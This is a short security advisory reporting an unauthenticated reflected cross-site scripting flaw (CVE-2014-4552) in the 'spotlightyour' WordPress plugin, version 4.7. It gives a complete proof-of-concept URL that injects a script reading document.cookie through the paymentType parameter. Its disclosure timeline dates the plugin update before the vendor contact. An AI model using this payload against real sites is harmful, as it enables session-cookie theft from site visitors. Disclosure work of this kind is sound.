wp-plugin : spotlightyour

Plugin Details
Plugin Name: wp-plugin : spotlightyour
Effected Version : 4.7 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/spotlightyour/library/includes/payment/paypalexpress/DoDirectPayment.php?paymentType=paymentType%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&


Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4552
Plugin Description :
[| Spotlight is a plugin by Daily Deal Builder where you spotlight various promotions and deals. You can use our built in deal feed, or you can make, post, and share deals all around the globe by downloading this plugin and making your own daily deal website with it. Offering deals and discounts on high quality products is a great way to further monetize your existing audience. ]